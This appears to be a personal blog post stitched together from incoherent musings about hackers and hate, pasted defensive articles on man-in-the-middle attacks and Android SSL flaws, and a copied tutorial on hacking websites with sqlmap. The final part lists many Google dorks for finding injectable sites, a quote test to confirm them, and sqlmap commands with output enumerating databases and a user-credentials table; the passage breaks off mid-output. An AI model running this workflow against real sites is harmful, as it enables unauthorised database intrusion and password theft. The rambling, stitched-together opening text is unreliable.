word..is press… in the middle…. if is was an “IT”..

hate plus hate equals…

hate plus hate equals… !?

when would it stop… meaning.. if “someone” can be set up”… then those that hate can be set up also.. in a never ending destruction cycle… and those.. that “love it”.. what is for them…

http://www.searchquotes.com/quotation/I_don%27t_hate_you_I%27m_just_not_necessarily_excited_about_your_existence./639261/

they seek… a “death by dishonor”… “high”… or “intoxications”… then when they get it… it is not enough… they need more…

…attacking “others” without… “complete understanding”..etc…

 

there is a fetish that involves… network hacks only… meaning… once you take the computer away… do they… believe… any more… in what they are doing…

sometimes… yes… in the hope that they will again.. and that the “battle” is there to “attack” thru another” later… etc..

the real question is … why… or for what….?

meaning… what drives you… is it … hate …if so.. hate of what… if you have never meet me… then why … would you say hate of prejudiced… when we have not..have had a relationship… and if sow…

are you a “hired hacker” or a “suaded hacker”… meaning… you are on a “cause stalking or “righteous mission’.. meaning.. you understand all things.. to deCern right and wrong with 100 percent … past , pressnet and future”… the same… “total understanding”

then take break for a second and think about… the who is giving you “credit” and “resources” to do the thing you are doing” …

meaning… “are “we”A Paths”…? being controlled by those that are “more intelligent thane’ us.. combined or summed up..?

is there a way to test that…

can faith be a measure of “systematic” intelligent hacking of the system”

they say the devil is patient… could that mean more patient then all humans combined… ever….( or with the combination of all human effort in this world…with patience….)

how would we measure that…?

would you look at “someone” else.. and think is it that person or that other person… and never understand… something greater… than even “us”…

is faith an understanding… beyond .. .even us… in view of “us”…

yet… all apathetic… viewing of each other is only… “us”…

existentialist distress and crys … are we alone… in a complex mess.. that spins the world… as a heads… spin the “fetty”… in.. too… a 2fer… of which you watch bleeding on the floor…in the tears.. of broken “dreams of …..peace”…

 

 

 

https://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/

https://www.hackthissite.org/

Thwarting the Man-in-the-Middle

can we trust any certificates…or server certificates…?

can you surf with out them?

Thwarting the Man-in-the-Middle

Do you know what a man-in-the-middle attack is? More importantly, do you know how to prevent one?

MITMCybercafes and libraries are perfect places to surf the Internet in a relaxed atmosphere. Unfortunately, they are also the perfect place for something else: man-in-the-middle (MITM) attacks.

An MITM Attack Is Like a Game: But They’re Playing with Your Information

An MITM attack is just like the childhood game of keep away, where two people throw a ball back and forth and a person in the middle tries to take the ball.

This childhood game is what happens in a MITM attack with a few key differences; rather than playing in a park, users are on their computer. And, instead of passing a ball back and forth, they’re passing their personal information. But the biggest difference is that unlike the children with the ball, users are unaware that the MITM is trying to get their information.

Public WiFi Is a Playground for Hackers

An MITM can use various software programs to sniff Internet traffic at a cybercafe, coffee shop, library, hotel, or university to discover the IP addresses of potential victims and the WiFi router on the network.

Through ARP spoofing, the attacker can redirect the traffic to flow through their own computer before getting to the server or hotspot. In essence, the attacker’s computer becomes (at least as far as the victim’s computer is concerned) the WiFi hotspot.

While in this position, anything passed between the user and the router the attacker can see in plain text (usernames and passwords, credit card numbers and PINs, account numbers, and any other sensitive information).

phishing-howphishing-mitm

The Potential Repercussions for Man-in-the-Middle Are Huge

You can imagine what an attacker could do with your sensitive information. If an attacker intercepted your username and password while you were on a website the attacker could do anything on there without you knowing.

Once you found out that your username and password had been compromised your trust in that particular website could be irrevocably damaged. All this can be done within a few minutes, by anyone with access to the software and without you knowing that your information had been compromised.

However, as with any attack, there are ways to help prevent you and your users from becoming victims.

Tips to Prevent and Avoid MITM Attacks

Avoid sending or accessing sensitive information over an open network

Unless you are absolutely sure that you are safe, leave these types of Internet usage for a secure network.

Trust your browser

Web browsers come with a list of trusted Certificate Authorities (CA). If there is a problem with the certificate because it has expired or was not installed correctly, a warning message will pop up. Similar messages will pop up if the certificate is not trusted or if it is a self-signed certificate.

Educate users on visual cues

There are a couple visual cues admins can educate users to look for before they log in to an email or bank account. The first visual cue is the https in the address bar. The s means the site is secure. When the s is not present users should not enter sensitive information in to the website.

Pay attention to warning messages

Any keen or even not so keen Internet surfer has no doubt received the message “Do you trust this computer?” or “This Connection is Untrusted.” With so many of these messages popping up it is very easy for a user to become frustrated. Once users become frustrated they may ignore the message and continue doing what they were doing, making them vulnerable to MITM attacks.

Use EV SSL Certificates on public-facing pages

There are many benefits to using an EV SSL certificate. For example, the green browser address bar that an EV certificate provides is a better visual cue for users than the https is alone. Studies have shown that customers are more likely to purchase from a site displaying an indicator that the site is secure.

By securing your site with an EV SSL certificate you are showing you clients that you care about keeping their information safe.

DigiCert Is Working to Keep You Safe

While man-in-the-middle attacks aren’t new, it’s important to make sure you’re taking the necessary precautions to guard against security attacks.

As an SSL Certificate provider, DigiCert is aware of the threats to your data security and is constantly working to prevent cyber criminals from accessing your data. We promote high-assurance certificates and are on the forefront of emerging markets, as demonstrated by our work with securing healthcare record transfers and using certificates to secure the Internet of Things.

Common Types of Network Attacks

Without security measures and controls in place, your data might be subjected to an attack. Some attacks are passive, meaning information is monitored; others are active, meaning the information is altered with intent to corrupt or destroy the data or the network itself.

Your networks and data are vulnerable to any of the following types of attacks if you do not have a security plan in place.

Eavesdropping

In general, the majority of network communications occur in an unsecured or “cleartext” format, which allows an attacker who has gained access to data paths in your network to “listen in” or interpret (read) the traffic. When an attacker is eavesdropping on your communications, it is referred to as sniffing or snooping. The ability of an eavesdropper to monitor the network is generally the biggest security problem that administrators face in an enterprise. Without strong encryption services that are based on cryptography, your data can be read by others as it traverses the network.

Data Modification

After an attacker has read your data, the next logical step is to alter it. An attacker can modify the data in the packet without the knowledge of the sender or receiver. Even if you do not require confidentiality for all communications, you do not want any of your messages to be modified in transit. For example, if you are exchanging purchase requisitions, you do not want the items, amounts, or billing information to be modified.

Identity Spoofing (IP Address Spoofing)

Most networks and operating systems use the IP address of a computer to identify a valid entity. In certain cases, it is possible for an IP address to be falsely assumed— identity spoofing. An attacker might also use special programs to construct IP packets that appear to originate from valid addresses inside the corporate intranet.

After gaining access to the network with a valid IP address, the attacker can modify, reroute, or delete your data. The attacker can also conduct other types of attacks, as described in the following sections.

Password-Based Attacks

A common denominator of most operating system and network security plans is password-based access control. This means your access rights to a computer and network resources are determined by who you are, that is, your user name and your password.

Older applications do not always protect identity information as it is passed through the network for validation. This might allow an eavesdropper to gain access to the network by posing as a valid user.

When an attacker finds a valid user account, the attacker has the same rights as the real user. Therefore, if the user has administrator-level rights, the attacker also can create accounts for subsequent access at a later time.

After gaining access to your network with a valid account, an attacker can do any of the following:

  • Obtain lists of valid user and computer names and network information.
  • Modify server and network configurations, including access controls and routing tables.
  • Modify, reroute, or delete your data.

Denial-of-Service Attack

Unlike a password-based attack, the denial-of-service attack prevents normal use of your computer or network by valid users.

After gaining access to your network, the attacker can do any of the following:

  • Randomize the attention of your internal Information Systems staff so that they do not see the intrusion immediately, which allows the attacker to make more attacks during the diversion.
  • Send invalid data to applications or network services, which causes abnormal termination or behavior of the applications or services.
  • Flood a computer or the entire network with traffic until a shutdown occurs because of the overload.
  • Block traffic, which results in a loss of access to network resources by authorized users.

Man-in-the-Middle Attack

As the name indicates, a man-in-the-middle attack occurs when someone between you and the person with whom you are communicating is actively monitoring, capturing, and controlling your communication transparently. For example, the attacker can re-route a data exchange. When computers are communicating at low levels of the network layer, the computers might not be able to determine with whom they are exchanging data.

Man-in-the-middle attacks are like someone assuming your identity in order to read your message. The person on the other end might believe it is you because the attacker might be actively replying as you to keep the exchange going and gain more information. This attack is capable of the same damage as an application-layer attack, described later in this section.

Compromised-Key Attack

A key is a secret code or number necessary to interpret secured information. Although obtaining a key is a difficult and resource-intensive process for an attacker, it is possible. After an attacker obtains a key, that key is referred to as a compromised key.

An attacker uses the compromised key to gain access to a secured communication without the sender or receiver being aware of the attack.With the compromised key, the attacker can decrypt or modify data, and try to use the compromised key to compute additional keys, which might allow the attacker access to other secured communications.

Sniffer Attack

A sniffer is an application or device that can read, monitor, and capture network data exchanges and read network packets. If the packets are not encrypted, a sniffer provides a full view of the data inside the packet. Even encapsulated (tunneled) packets can be broken open and read unless they are encrypted and the attacker does not have access to the key.

Using a sniffer, an attacker can do any of the following:

  • Analyze your network and gain information to eventually cause your network to crash or to become corrupted.
  • Read your communications.

Application-Layer Attack

An application-layer attack targets application servers by deliberately causing a fault in a server’s operating system or applications. This results in the attacker gaining the ability to bypass normal access controls. The attacker takes advantage of this situation, gaining control of your application, system, or network, and can do any of the following:

  • Read, add, delete, or modify your data or operating system.
  • Introduce a virus program that uses your computers and software applications to copy viruses throughout your network.
  • Introduce a sniffer program to analyze your network and gain information that can eventually be used to crash or to corrupt your systems and network.
  • Abnormally terminate your data applications or operating systems.
  • Disable other security controls to enable future attacks.

https://technet.microsoft.com/en-us/library/cc959354.aspx

tempera y …. shutdowns… coming soon.. meaning… are scheduled… shutdowns.. part of a … “tactics” for or against s… that “quota”…?

\

SSL Vulnerabilities in the Google Play 1,000 Most Downloaded Applications

We reviewed the 1,000 most-downloaded free applications in the Google Play store as of July 17, 2014. Of these, 674 (~68%) have at least one of the three SSL vulnerabilities that we studied. In Figure 1, we present the number of vulnerable applications we found in each category:

  • Using trust managers that do not check certificates
    • Of the 614 applications that use SSL/TLS to communicate with a remote server, 448 (~73%) do not check certificates
  • Using hostname verifiers that do nothing
    • 50 (~8%) use their own hostname verifiers that do not check hostnames
  • Ignoring SSL errors in Webkit
    • Of the 285 that use Webkit, 219 (~77%) ignore SSL errors generated in Webkit

androidssl1

Figure 1. SSL vulnerabilities in the Google Play top 1000 applications

SSL Vulnerabilities at Large

We analyzed roughly 10,000 applications from the Google Play store. This was a random sample of free applications. Roughly 4,000 (40%) use trust managers that do not check server certificates, exposing any data they exchange with their servers to potential theft. Furthermore, around 750 (7%) applications use hostname verifiers that do not check hostnames, implying that they are incapable of detecting redirection attacks where the attacker redirects the server request to a malicious webserver controlled by the attacker. Finally, 1,300 (13%) do not check SSL errors when they use Webkit.

Case Studies (Applications rendered vulnerable due to vulnerable libraries)

Applications may use third-party libraries to enable part of their functionality. When these libraries have baked-in vulnerabilities, they are particularly dangerous because they make all applications that use them, and frequently the devices that run them, vulnerable. Furthermore, these vulnerabilities are not weaknesses in the applications themselves, but in the features they rely upon for functionality.

Flurry. Flurry is the number-one ranked ad library in the market used by 9,702 out of 70,000+ Google Play apps with 50,000 or more downloads. These applications have been downloaded over 8.7 billion times. As with many ad libraries, Flurry (prior to version 3.4) uses HTTPS with a vulnerable trust manager to upload information like device IMEI and location.

In a proof of concept for an MITM attack, we successfully used a vulnerable version of Flurry to capture the information sent to the remote server https://data.flurry.com. We successfully matched the location of the simulation device against the data being sent by Flurry. In Figure 2, we show a hexdump of the data we captured during this MITM attack.

Ad libraries enable the delivery of targeted advertisements by transmitting sensitive user information, but it is essential that they use HTTPS to send it in a manner that protects against MITM attacks.  The potential privacy breach is compounded when users are unaware of the ad libraries used and how their personal information can be read by unintended recipients.

androidssl2

Figure 2. Hexdump of the data that is being sent using insecure HTTPS

The presence of this vulnerability was communicated to the Flurry developers. They acknowledged the vulnerability was addressed starting in version 3.4 of the ad library.

Chartboost. Chartboost is an ad library used by 5,170 of 70,000+ Google Play apps with 50,000 or more downloads. The aggregate download count for all these applications is over 4.5 billion. Chartboost also used a trust manager that is vulnerable to MITM attacks. In this experimental setup, we intercepted traffic that contains the device IMEI sent over SSL/TLS sockets. While Chartboost has addressed this vulnerability after version 2.0.1, a number of applications with over 5 million downloads in the Google Play store still use vulnerable versions of Chartboost.

The presence of these vulnerabilities was communicated to the developers of Chartboost. They acknowledged that the vulnerability was addressed in a release subsequent to 2.0.1 of the ad library.

Case Studies (Applications that are inherently vulnerable)

Camera360 Ultimate. This is an application that has more than 250 million downloads worldwide. The following is the description of the application from the Google Play store.

Camera360, loved by more than 250 million users globally, is No.1 camera app in many countries. Together with HelloCamera, Movie360, and Pink360, Camera360 provides a comprehensive suite of professional yet fun mobile photography options.

To make your life even easier, Camera360 has introduced Camera360 Cloud, a cloud platform that can help you manage, edit, store, and share your photos all in one place. Join the millions of users in enjoying these FREE services!

Besides inheriting SSL vulnerabilities from the ad libraries used by the application, none of the application’s trust managers uses check server certificates. In another proof-of-concept for an MITM attack that exploits these vulnerabilities, we intercepted all HTTPS traffic between the application and the remote servers it used, allowing us to potentially:

  1. Steal or inject photos/albums at random;
  2. Steal user’s login “local key” to the Camera360 cloud, and many other local device/user specifications (device model, android version, user nickname, user email account, etc.); and
  3. Intercept user credentials (Facebook, Twitter, Sina, QQ, etc.), or inject fake login pages/malicious Javascript to steal any account credentials.

The app has Javascript Binding Over HTTP (JBOH) together with many powerful permissions (camera, audio recording, video recording, etc.), which opens the door to even more sophisticated attacks.

These vulnerabilities were communicated to the Camera360 developers, who were highly proactive in fixing the reported issues and releasing an update addressing them on July 29, 2014.

Application “X”. This application has over 100M downloads and is one of the fastest-growing applications in the Google Play marketplace. Similar to Camera360, Application “X” does not check server certificates when establishing SSL connections. This app’s core functionality pushes images of interest to users. This functionality can be hijacked using an MITM attack, allowing a hacker to inject malicious images into the application, launch a denial of service attack, or worse yet, hold a user’s data for ransom using a DOS attack.

Repeated attempts to contact the developers of Application “X” went unanswered. We therefore chose to anonymize the name of the application until a fix is put in place.

Best Practices

For a detailed explanation of common SSL pitfalls and ways to alleviate them, please see Android Security-SSL. Any application connecting to a third-party web service is likely automatically able to verify server certificates and hostnames.  These platforms usually have more than 100 CAs, and will validate any third-party server that presents a certificate signed by any of them.

If the server certificate is self-signed or comes from a CA the Android platform doesn’t trust, it requires the attention of the application developer. In these cases, the steps to use a custom trust manager are as follows:

  1. Create a KeyStore and set its certificate entry to the certificate to authenticate against
  2. Initialize a TrustManager instance with the KeyStore
  3. Use this instance of the TrustManager class in SSLContext objects used to establish remote server connections

Mobile device users can protect themselves by not accessing websites that require user login credentials when using public wi-fi networks. This in itself, with general vigilance in opening emails from unknown sources, will go a long way in protecting sensitive information from MITM attacks.

We hope that publications like this encourage application developers to stay current on the versions of third-party libraries they use, and to talk to the developers of third-party libraries to ensure the end users’ privacy is not compromised through backdoors.

Acknowledgments: We would like to thank Tao Wei and Dawn Song for their technical inputs that lead to developing of the SSL vulnerability detection capability, and Rebecca Stroder, Kyrksen Storer and the team behind the FireEye Mobile Threat Prevention Platform for their feedback. We also acknowledge the developers of Camera360 Ultimate, Flurry, and Chartboost for being proactive in fixing all reported issues.

Appendix: MITM Attacker and the Mechanics of an MITM Attack

As shown in Figure 3, a Man-In-The-Middle (MITM) attack works as follows:

  • Alice initiates a conversation with Bob
  • Mallory intercepts the conversation and relays the request to Bob
  • Bob responds, Mallory intercepts the response and forwards it to Alice

Neither Alice nor Bob are aware of Mallory’s presence. In our scenario, Alice is an Android application and Bob is the remote server. Mallory is a Man-In-The-Middle attacker with Internet access. Correct use of the platform SSL/TLS library would prevent Mallory from masquerading as Bob in his communication with Alice, and as Alice in her communication with Bob.

androidssl3

Figure 3. A Man-In-The-Middle attack flow

An MITM attacker has access to the Internet and controls a network proxy to direct all traffic originating from a network, such as a wi-fi network, to the Internet. Setting up an MITM attack is as easy as having access to the network proxy and using an off-the-shelf MITM proxy in place of a standard proxy. A standard proxy is limited to setting up an opaque conduit for all communication with no mechanism to read the data that is actually sent. An MITM proxy, on the other hand, plays the role of Mallory in Figure 3, masquerading as the remote server to mobile clients and as the mobile client to the remote server. Public wi-fi networks such as those in airports, cafes, etc., are open to exploitation by such MITM attackers. These networks use basic configurations without firewalls, VPNs, or intrusion detection systems. Attackers build open networks to snoop data that passes between user devices and remote servers. Sophisticated MITM attackers may use phishing emails to change a user’s device configurations, directing all Internet traffic originating from the device to a proxy server they control.

https://www.fireeye.com/blog/threat-research/2014/08/s

“Two years ago, IOActive tested 40 mobile banking apps and found that 40 per cent of them are vulnerable to MITM attacks,” the firm said.

“Another group of researchers from Leibniz University of Hanover and Philipps University of Marburg found that eight per cent of popular Android apps fail to verify certificates.

“A passive MITM attack against these mobile apps is very real when you use a public WiFi hotspot. The attack is also possible in the case of a web server accessing a third-party API.”

TLS security ‘neglect’ exposes web users to man-in-the-middle attacks

http://www.theinquirer.net/inquirer/news/2453541/tls-security-neglect-exposes-web-users-to-man-in-the-middle-attacks

http://www.globalspec.com/reference/47491/203279/chapter-9-using-man-in-the-middle-attacks-to-your-advantage

http://www.globalspec.com/reference/47491/203279/chapter-9-using-man-in-the-middle-attacks-to-your-advantage

From WarDriving & Wireless Penetration Testing

Introduction

This chapter discusses the hardware required for a wireless Man-in-the-Middle (MITM) attack and demonstrates how to:

  • Install and configure a MITM attack laptop
  • Identify and compromise a MITM target wireless access point (AP)
  • De-authenticate wireless clients from the target AP and have them associate to the MITM AP
  • Provide a basic example of MITM attack by spoofing a Web application in order to harvest user credentials.

What is a MITM Attack?

A MITM attack allows attackers to intercept and modify traffic to and from a wireless network without the wireless client knowing that the link has been compromised. The main goal of this attack is to compromise user account credentials during a wireless penetration test. The MITM attack is typically used to capture user account information on Web-based applications, capture passwords sent in clear text, and sniff and crack windows password hashes.

MITM Attack Design

A basic MITM attack connects a wireless client to a client s (victim s) access, and then forwards the traffic to the real (authorized) AP. A typical MITM design consists of the components shown in Figure 9.1.


Figure 9.1: Typical MITM Design

The Target AP(s)

Wireless penetration tests the security controls of wireless networks (referred to as target wireless access points). To successfully perform a MITM attack, an attacker needs one or more target APs, because many organizations implement hundreds of APs to their employees.

The Victim Wireless Client(s)

Wireless clients or the victim(s) of the MITM attack, has an initial wireless connection to the target…


Products & Services
Network Firewalls

Network firewalls protect computer networks against unauthorized use or attack. They permit or deny access to private network devices and applications, and represent an important part of an organization’s overall security policy. Firewalls may be software applications, hardware devices (such as routers), or a combination of both. They include turnkey products that are relatively easy to install as well as complex, multi-layer installations that require the expertise of a certified network administrator.
Network Simulation Software

Network simulation software is designed to model the potential behaviors of computer networks.
Wireless Communications Services

Wireless communications services provide cellular phone service, SMS, WAP and GPRS services to mobile phones.
Invoice Software

Invoice software is used to create, print, and send invoices to customers for payment.
Network Security Services

Network security services determine vulnerability of networks to outside intruders, as well as maintain anti-viral and firewall updates and usage.

Topics of Interest

Choices for Modifying the Firmware on a Wireless Access Point When it comes to modifying the firmware on an access point, there are several different choices that can be installed on a wide variety…

Chapter List Chapter 4: Installing, Configuring, & Managing Windows 2000 Certificate Authorities Chapter 5: Managing and Troubleshooting the Encrypting File System Introduction Organizations today…

Introduction In this chapter, we examine methods to attack and defend the Data Link layer, which provides the mechanisms by which data is transferred from node to node across a network. We start the…

Numbers 128-bit encryption, 175, 176 178, 198 128-bit keys, 197 198 2.4 GHz frequency, 164, 170, 216 3-DES (Triple DES), 502 503 40-bit encryption, 175, 176 178 64-bit encryption, 198 64-bit…

Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter…

https://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-10SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL databases. In this guide I will show you how to SQLMAP SQL Injection on Kali Linux to hack a website (more specifically Database) and extract usernames and passwords on Kali Linux.

What is SQLMAP

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

  1. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  3. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  5. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  6. Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  7. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  8. Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  9. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  11. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

[Source: http://www.sqlmap.org]Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make his days end. Your actions might impact someone is a way you never wished for. I think I can’t make it anymore clearer.

So here goes:

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.

Google Dork string Column 1 Google Dork string Column 2 Google Dork string Column 3
inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=
inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=
inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=
inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=
inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=
inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=
inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=
inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=
inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=
inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=
inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=
inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=
inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id=
inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=
inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=
inurl:news.php?id= inurl:newsticker_info.php?idn= inurl:collectionitem.php?id=
inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=
inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=
inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=
inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=
inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id=
inurl:declaration_more.php?decl_id= inurl:news_view.php?id= inurl:pop.php?id=
inurl:pageid= inurl:select_biblio.php?id= inurl:shopping.php?id=
inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=
inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=
inurl:newsDetail.php?id= inurl:ogl_inet.php?ogl_id= inurl:viewshowdetail.php?id=
inurl:gallery.php?id= inurl:fiche_spectacle.php?id= inurl:clubpage.php?id=
inurl:article.php?id= inurl:communique_detail.php?id= inurl:memberInfo.php?id=
inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id=
inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=
inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=
inurl:readnews.php?id= inurl:index.php?id= inurl:shredder-categories.php?id=
inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=
inurl:historialeer.php?num= inurl:show_an.php?id= inurl:product_ranges_view.php?ID=
inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num= inurl:loadpsb.php?id= inurl:transcript.php?id=
inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id=
inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=
inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=
inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=
inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=
inurl:news.php?id= inurl:participant.php?id=
inurl:avd_start.php?avd= inurl:download.php?id=
inurl:event.php?id= inurl:main.php?id=
inurl:product-item.php?id= inurl:review.php?id=
inurl:sql.php?id= inurl:chappies.php?id=
inurl:material.php?id= inurl:read.php?id=
inurl:clanek.php4?id= inurl:prod_detail.php?id=
inurl:announce.php?id= inurl:viewphoto.php?id=
inurl:chappies.php?id= inurl:article.php?id=
inurl:read.php?id= inurl:person.php?id=
inurl:viewapp.php?id= inurl:productinfo.php?id=
inurl:viewphoto.php?id= inurl:showimg.php?id=
inurl:rub.php?idr= inurl:view.php?id=
inurl:galeri_info.php?l= inurl:website.php?id=

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.

Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

Just add a single quotation mark ‘ at the end of the URL. (Just to ensure, ” is a double quotation mark and ‘ is a single quotation mark).

So now your URL will become like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.

See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-1

Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.

Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12

Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)

Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”

Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.

Run the following command on your vulnerable website with.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
–dbs = Enumerate DBMS databases

See screenshot below.

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-2

This commands reveals quite a few interesting info:

web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Sweet, this database got 8 tables.

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-3

and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
